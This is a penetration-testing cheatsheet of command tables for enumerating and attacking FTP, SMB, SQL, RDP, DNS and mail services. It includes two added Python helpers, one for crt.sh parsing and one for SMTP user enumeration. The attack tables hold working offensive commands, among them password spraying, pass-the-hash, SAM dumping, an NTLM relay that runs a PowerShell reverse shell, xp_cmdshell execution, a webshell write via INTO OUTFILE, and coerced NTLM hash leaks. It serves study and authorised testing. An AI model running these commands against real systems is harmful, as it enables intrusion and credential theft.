Foothold Cheatsheet
Initial Foothold
Technical work often hinges on recalling the exact command, flag or syntax. These cheatsheets condense the tools, techniques and workflows used during footprinting and service attacks into quick-reference tables, grouped by service, with placeholders in angle brackets for the values you supply. Whether you are scanning networks, enumerating services or testing credentials, use this collection as your "initial foothold" for rapid execution. Check flags against the installed tool version, since options differ between releases, and bookmark or print the tables so the critical syntax stays at your fingertips.
Infrastructure-based Enumeration
Command | Description |
---|---|
curl -s "https://crt.sh/?q=<domain>&output=json" \| jq . | Query certificate transparency logs (crt.sh) for certificates issued for the domain; the name_value field of each record lists the hostnames. |
for i in $(cat ip-addresses.txt);do shodan host $i;done | Scan each IP address in a list using Shodan. |
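The crt.sh query above returns one JSON record per certificate, with every subject alternative name packed into a single newline-separated field, and a substring match that can pull in unrelated certificates. The script below, added here as an example and not part of the original cheatsheet, turns that output into a deduplicated hostname list: it splits the SAN field, lowercases names, drops wildcards, discards names outside the queried domain and, optionally, certificates that had already expired on a given date. It runs offline on a constructed sample in crt.sh's shape; the domain example.com, the issuer names and all date values are assumptions.

```python
"""Turn crt.sh JSON output into a clean hostname list (added example)."""
import json
import sys

# Constructed sample in the shape crt.sh returns for ?q=example.com&output=json
# (only the fields this script reads). Values are assumptions, not real data.
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com",
     "not_before": "2024-01-01T00:00:00", "not_after": "2024-03-31T23:59:59"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "common_name": "*.example.com",
     "name_value": "*.example.com\nexample.com",
     "not_before": "2023-06-01T00:00:00", "not_after": "2023-08-30T23:59:59"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "common_name": "Vpn.Example.com",
     "name_value": "Vpn.Example.com\nmail.example.com\nexample-cdn.net",
     "not_before": "2024-02-01T00:00:00", "not_after": "2025-02-01T23:59:59"},
])


def crtsh_hostnames(raw_json, domain, include_wildcards=False, as_of=None):
    """Return sorted unique hostnames under `domain` found in crt.sh records.

    crt.sh packs every SAN of a certificate into `name_value`, newline
    separated, so one record can yield several names. Names are lowercased
    (DNS is case-insensitive; crt.sh keeps what the CA issued). Wildcards are
    dropped unless asked for: "*.example.com" is not a resolvable host.
    Names outside `domain` are dropped: the crt.sh search is a substring
    match and can return unrelated certificates. With `as_of` (ISO 8601
    timestamp), certificates that expired before that moment are skipped,
    which removes hosts that may no longer exist.
    """
    domain = domain.lower().strip(".")
    names = set()
    for record in json.loads(raw_json):
        if as_of is not None and record.get("not_after", "") < as_of:
            continue  # ISO timestamps in one format compare correctly as strings
        for name in record.get("name_value", "").split("\n"):
            name = name.strip().lower().rstrip(".")
            if not name or (name.startswith("*.") and not include_wildcards):
                continue
            if name == domain or name.endswith("." + domain):
                names.add(name)
    return sorted(names)


def crtsh_issuers(raw_json):
    """Count certificates per issuing CA; a CA the organisation does not
    normally use is worth a closer look during footprinting."""
    counts = {}
    for record in json.loads(raw_json):
        issuer = record.get("issuer_name", "unknown")
        counts[issuer] = counts.get(issuer, 0) + 1
    return counts


if __name__ == "__main__":
    # Usage: curl -s "https://crt.sh/?q=<domain>&output=json" | python3 crtsh_hosts.py <domain>
    # Without arguments the constructed sample is processed instead.
    if len(sys.argv) > 1:
        raw, domain = sys.stdin.read(), sys.argv[1]
    else:
        raw, domain = SAMPLE_CRTSH_JSON, "example.com"
    for host in crtsh_hostnames(raw, domain):
        print(host)
    for issuer, n in crtsh_issuers(raw).items():
        print("%d cert(s) from %s" % (n, issuer))
```

Pipe the curl command from the table into the script with the domain as its argument; the resulting list feeds straight into host lookups or a vhost wordlist, and the issuer counts show at a glance which CAs the organisation uses.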
Host-based Enumeration
FTP
Command | Description |
---|---|
ftp <FQDN/IP> | Interact with the FTP service on the target. |
nc -nv <FQDN/IP> 21 | Interact with the FTP service on the target. |
telnet <FQDN/IP> 21 | Interact with the FTP service on the target. |
openssl s_client -connect <FQDN/IP>:21 -starttls ftp | Interact with the FTP service on the target using encrypted connection. |
wget -m --no-passive-ftp ftp://anonymous:anonymous@<FQDN/IP> | Mirror (recursively download) every file the anonymous user can read on the target FTP server. |
SMB
Command | Description |
---|---|
smbclient -N -L //<FQDN/IP> | List shares using a null session (no password). |
smbclient //<FQDN/IP>/<share> | Connect to a specific SMB share. |
rpcclient -U "" <FQDN/IP> | Interact with the target over MS-RPC using a null session. |
samrdump.py <FQDN/IP> | Username enumeration using Impacket's samrdump (SAMR interface). |
smbmap -H <FQDN/IP> | Enumerate SMB shares and the current user's permissions on them. |
crackmapexec smb <FQDN/IP> --shares -u '' -p '' | Enumerate SMB shares using null session authentication. |
enum4linux-ng.py <FQDN/IP> -A | All-in-one SMB/RPC enumeration using enum4linux-ng. |
NFS
Command | Description |
---|---|
showmount -e <FQDN/IP> | Show the exports offered by the NFS server and which clients may mount them. |
mount -t nfs <FQDN/IP>:/ ./target-NFS/ -o nolock | Mount the export under ./target-NFS/ (create the directory first; usually needs root). |
umount ./target-NFS | Unmount the export. |
DNS
Command | Description |
---|---|
dig ns <domain.tld> @<nameserver> | NS request to the specified nameserver. |
dig any <domain.tld> @<nameserver> | ANY request to the specified nameserver (many servers now answer ANY with a minimal response). |
dig axfr <domain.tld> @<nameserver> | AXFR (zone transfer) request to the specified nameserver. |
dnsenum --dnsserver <nameserver> --enum -p 0 -s 0 -o found_subdomains.txt -f ~/subdomains.list <domain.tld> | Subdomain brute forcing with a wordlist. |
SMTP
Command | Description |
---|---|
telnet <FQDN/IP> 25 | Connect to the SMTP service and interact with it manually. |
IMAP/POP3
Command | Description |
---|---|
curl -k 'imaps://<FQDN/IP>' --user <user>:<password> | Log in to the IMAPS service using cURL (-k skips certificate validation). |
openssl s_client -connect <FQDN/IP>:imaps | Connect to the IMAPS service. |
openssl s_client -connect <FQDN/IP>:pop3s | Connect to the POP3s service. |
SNMP
Command | Description |
---|---|
snmpwalk -v2c -c <community> <FQDN/IP> | Walk the OID tree with snmpwalk (SNMPv2c, using the given community string). |
onesixtyone -c community-strings.list <FQDN/IP> | Brute-forcing community strings of the SNMP service. |
braa <community>@<FQDN/IP>:.1.* | Brute-forcing SNMP OIDs with braa. |
MySQL
Command | Description |
---|---|
mysql -u <user> -p<password> -h <FQDN/IP> | Log in to the MySQL server (no space between -p and the password; omit the password to be prompted). |
MSSQL
Command | Description |
---|---|
mssqlclient.py <user>@<FQDN/IP> -windows-auth | Log in to the MSSQL server using Windows authentication (Impacket). |
IPMI
Command | Description |
---|---|
msf6 > use auxiliary/scanner/ipmi/ipmi_version | IPMI version detection (Metasploit). |
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes | Dump IPMI 2.0 RAKP password hashes for offline cracking (Metasploit). |
Linux Remote Management
Command | Description |
---|---|
ssh-audit.py <FQDN/IP> | Remote security audit against the target SSH service (banner, key exchange, ciphers, host key algorithms). |
ssh <user>@<FQDN/IP> | Log in to the SSH server using the SSH client. |
ssh -i private.key <user>@<FQDN/IP> | Log in to the SSH server using a private key. |
ssh <user>@<FQDN/IP> -o PreferredAuthentications=password | Enforce password-based authentication. |
Windows Remote Management
Command | Description |
---|---|
rdp-sec-check.pl <FQDN/IP> | Check the security settings (encryption level, NLA) of the RDP service. |
xfreerdp /u:<user> /p:"<password>" /v:<FQDN/IP> | Log in to the RDP server from Linux. |
evil-winrm -i <FQDN/IP> -u <user> -p <password> | Log in to the WinRM server. |
wmiexec.py <user>:"<password>"@<FQDN/IP> "<command>" | Execute a command using the WMI service (Impacket). |
Oracle TNS
Command | Description |
---|---|
./odat.py all -s <FQDN/IP> | Perform a variety of scans to gather information about the Oracle database services and their components. |
sqlplus <user>/<password>@<FQDN/IP>/<SID> | Log in to the Oracle database. |
./odat.py utlfile -s <FQDN/IP> -d <SID> -U <user> -P <password> --sysdba --putFile C:\insert\path file.txt ./file.txt | Upload a file with Oracle RDBMS (UTL_FILE); --sysdba requires SYSDBA privileges. |
Attacking FTP
Command | Description |
---|---|
ftp 192.168.2.142 | Connecting to the FTP server using the ftp client. |
nc -v 192.168.2.142 21 | Connecting to the FTP server using netcat. |
hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142 | Brute-forcing the FTP service. |
Attacking SMB
Command | Description |
---|---|
smbclient -N -L //10.129.14.128 | Null-session testing against the SMB service. |
smbmap -H 10.129.14.128 | Network share enumeration using smbmap. |
smbmap -H 10.129.14.128 -r notes | Recursive listing of the "notes" share using smbmap. |
smbmap -H 10.129.14.128 --download "notes\note.txt" | Download a specific file from the shared folder. |
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt" | Upload a specific file to the shared folder. |
rpcclient -U'%' 10.10.110.17 | Null session with rpcclient. |
./enum4linux-ng.py 10.10.11.45 -A -C | Automated enumeration of the SMB service using enum4linux-ng. |
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' | Password spraying: one password against every user in a list (check the lockout policy first, e.g. with --pass-pol). |
impacket-psexec administrator:'Password123!'@10.10.110.17 | Get a SYSTEM shell over SMB using impacket-psexec (writes a service binary to ADMIN$). |
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec | Execute a command over the SMB service using crackmapexec. |
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users | Enumerate logged-on users across a subnet. |
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam | Extract hashes from the SAM database. |
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE | Pass-the-Hash: authenticate with the NT hash instead of the password. |
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 | Relay captured NTLM authentication to the target and dump its SAM database (the target must not require SMB signing). |
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 payload>' | Relay NTLM authentication and execute a PowerShell-based (base64-encoded) reverse shell on the target. |
Attacking SQL Databases
Command | Description |
---|---|
mysql -u julio -pPassword123 -h 10.129.20.13 | Connect to the MySQL server. |
sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30 | Connect to the MSSQL server from Windows (-y and -Y limit column display width). |
sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h | Connect to the MSSQL server from Linux (SQL Server authentication). |
sqsh -S 10.129.203.7 -U .\julio -P 'MyPassword!' -h | Connect to the MSSQL server from Linux when the server uses Windows authentication (the .\ prefix denotes a local Windows account). |
mysql> SHOW DATABASES; | Show all available databases in MySQL. |
mysql> USE htbusers; | Select a specific database in MySQL. |
mysql> SHOW TABLES; | Show all available tables in the selected database in MySQL. |
mysql> SELECT * FROM users; | Select all available entries from the "users" table in MySQL. |
sqlcmd> SELECT name FROM master.dbo.sysdatabases | Show all available databases in MSSQL. |
sqlcmd> USE htbusers | Select a specific database in MSSQL. |
sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES | Show all available tables in the selected database in MSSQL. |
sqlcmd> SELECT * FROM users | Select all available entries from the "users" table in MSSQL. |
sqlcmd> EXECUTE sp_configure 'show advanced options', 1 | Allow advanced options to be changed. |
sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1 | Enable xp_cmdshell (needs the sysadmin role or ALTER SETTINGS permission). |
sqlcmd> RECONFIGURE | Run after each sp_configure command to apply the change. |
sqlcmd> xp_cmdshell 'whoami' | Execute a system command from the MSSQL server (runs as the SQL Server service account, or the configured proxy account for non-sysadmins). |
mysql> SELECT "<file contents>" INTO OUTFILE '/var/www/html/webshell.php' | Write a file on the server using MySQL (needs the FILE privilege, a secure_file_priv that permits the path, and write access for the MySQL process to that directory). |
mysql> show variables like "secure_file_priv"; | Check secure_file_priv: an empty value lets LOAD_FILE and INTO OUTFILE reach any path the MySQL process can, a directory restricts them to it, and NULL disables file operations. |
sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents | Read local files in MSSQL (needs ADMINISTER BULK OPERATIONS permission). |
mysql> select LOAD_FILE("/etc/passwd"); | Read local files in MySQL. |
sqlcmd> EXEC master..xp_dirtree '\\10.10.110.17\share' | Hash stealing: make the SQL Server service account authenticate with NTLM to an attacker-controlled share via xp_dirtree. |
sqlcmd> EXEC master..xp_subdirs '\\10.10.110.17\share' | Hash stealing using the xp_subdirs command in MSSQL (same effect as xp_dirtree). |
sqlcmd> SELECT srvname, isremote FROM sysservers | Identify linked servers in MSSQL (isremote = 1 is a remote server, 0 a linked server). |
sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS] | Identify the user and its privileges used for the linked-server connection in MSSQL. |
Attacking RDP
Command | Description |
---|---|
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123' | Password spraying against the RDP service. |
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp | Password spraying against the RDP service with hydra (one password, many users). |
rdesktop -u admin -p password123 192.168.2.143 | Connect to the RDP service using rdesktop in Linux. |
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} | Attach another user's session to ours without their password (must run as SYSTEM). |
net start sessionhijack | Start a service created beforehand (with sc.exe) that runs the tscon command as SYSTEM, performing the RDP session hijack. |
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f | Enable "Restricted Admin Mode" on the target Windows host (value 0 enables it); needed for RDP pass-the-hash. |
xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA | Pass-the-Hash login over RDP using the NT hash (requires Restricted Admin Mode on the target). |
Attacking DNS
Command | Description |
---|---|
dig AXFR @ns1.inlanefreight.htb inlanefreight.htb | Attempt a zone transfer (AXFR) against a specific name server. |
subfinder -d inlanefreight.com -v | Passive subdomain enumeration using subfinder (certificate logs, search engines and similar sources; not brute force). |
host support.inlanefreight.com | DNS lookup for the specified subdomain. |
Attacking Email Services
Command | Description |
---|---|
host -t MX microsoft.com | DNS lookup of the mail servers (MX records) for the specified domain. |
dig mx inlanefreight.com \| grep "MX" | DNS lookup of the MX records for the specified domain, filtered to the MX lines. |
host -t A mail1.inlanefreight.htb. | DNS lookup of the IPv4 address for the specified subdomain. |
telnet 10.10.110.20 25 | Connect to the SMTP server. |
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7 | SMTP user enumeration using the RCPT TO command against the specified host. |
python3 o365spray.py --validate --domain msplaintext.xyz | Verify whether the specified domain uses Office 365. |
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz | Enumerate existing Office 365 users on the specified domain. |
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz | Password spraying against a list of Office 365 users (--count attempts per --lockout-hour window, to stay under the lockout threshold). |
hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3 | Password spraying against the POP3 service (-f stops at the first valid login). |
swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Notification' --body 'Message' --server 10.10.11.213 | Test the SMTP service for open relay (the server accepts and forwards mail for addresses it is not responsible for). |
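The smtp-user-enum line above relies on the server answering RCPT TO differently for existing and non-existing mailboxes. The script below, an added example rather than smtp-user-enum's code or part of the original cheatsheet, performs that exchange itself (HELO, MAIL FROM, one RCPT TO per candidate, reading the reply code each time) and adds the check a practitioner wants before trusting any result: a probe with a random local part, because a catch-all server answers 250 to everything and makes the technique meaningless. It runs offline against the constructed in-memory `FakeSmtp` responder; the mailbox names, the sender address and the `SocketSmtp` class are assumptions, and inlanefreight.htb is the domain from the table.

```python
"""SMTP RCPT TO user enumeration with a catch-all check (added example)."""
import random
import socket
import string


class FakeSmtp:
    """Constructed in-memory SMTP responder (assumed mailboxes, not real data).
    `catch_all=True` makes it accept any recipient, as some relays do."""

    def __init__(self, catch_all=False):
        self.known = {"admin", "jsmith", "svc-backup"}
        self.catch_all = catch_all
        self.replies = ["220 mail1.inlanefreight.htb ESMTP"]
        self.log = []                           # every command line received

    def send(self, line):
        self.log.append(line)
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.replies.append("250 mail1.inlanefreight.htb")
        elif verb == "MAIL":
            self.replies.append("250 2.1.0 Ok")
        elif verb == "RCPT":
            local = arg.split(":", 1)[1].strip("<> ").split("@")[0].lower()
            if self.catch_all or local in self.known:
                self.replies.append("250 2.1.5 Ok")
            else:
                self.replies.append("550 5.1.1 <%s>: Recipient address rejected" % local)
        elif verb == "QUIT":
            self.replies.append("221 2.0.0 Bye")
        else:
            self.replies.append("502 5.5.2 Error: command not recognized")

    def recv(self):
        return self.replies.pop(0)


class SocketSmtp:
    """Socket-backed transport with the same send()/recv() interface, for a real target."""

    def __init__(self, host, port=25, timeout=10):
        self.f = socket.create_connection((host, port), timeout=timeout).makefile("rwb")

    def send(self, line):
        self.f.write((line + "\r\n").encode("ascii"))
        self.f.flush()

    def recv(self):
        line = self.f.readline().decode("ascii", "replace")
        while line[3:4] == "-":          # skip continuation lines of multi-line replies
            line = self.f.readline().decode("ascii", "replace")
        return line.rstrip()


def _code(reply):
    return int(reply[:3])


def enumerate_rcpt(transport, domain, candidates, sender="probe@inlanefreight.htb"):
    """Return (valid_users, catch_all).

    Runs HELO, MAIL FROM, then one RCPT TO per candidate; 250/251 means the
    mailbox exists, 550 that it does not. A random local part is probed first:
    if that is accepted too, the server is a catch-all and every later 250 is
    meaningless, so the function reports catch_all=True and no users.
    """
    transport.recv()                                   # 220 banner
    transport.send("HELO probe.local")
    if _code(transport.recv()) != 250:
        raise RuntimeError("HELO rejected")
    transport.send("MAIL FROM:<%s>" % sender)
    if _code(transport.recv()) != 250:
        raise RuntimeError("MAIL FROM rejected; RCPT enumeration not possible")
    bogus = "".join(random.choices(string.ascii_lowercase, k=12))
    transport.send("RCPT TO:<%s@%s>" % (bogus, domain))
    catch_all = _code(transport.recv()) in (250, 251)
    valid = []
    if not catch_all:
        for user in candidates:
            transport.send("RCPT TO:<%s@%s>" % (user, domain))
            if _code(transport.recv()) in (250, 251):
                valid.append(user)
    transport.send("QUIT")
    transport.recv()
    return valid, catch_all


if __name__ == "__main__":
    # Offline demonstration against the fake; for a real host use
    # enumerate_rcpt(SocketSmtp("<FQDN/IP>"), "<domain>", users).
    print(enumerate_rcpt(FakeSmtp(), "inlanefreight.htb",
                         ["admin", "nobody", "JSmith", "svc-backup"]))
    print(enumerate_rcpt(FakeSmtp(catch_all=True), "inlanefreight.htb", ["admin"]))
```

Real servers add two complications the fake does not model: many cap the number of RCPT commands per transaction or slow down after a run of rejections, so long lists should be split across connections, and the VRFY/EXPN modes of smtp-user-enum can return 252, which confirms nothing either way.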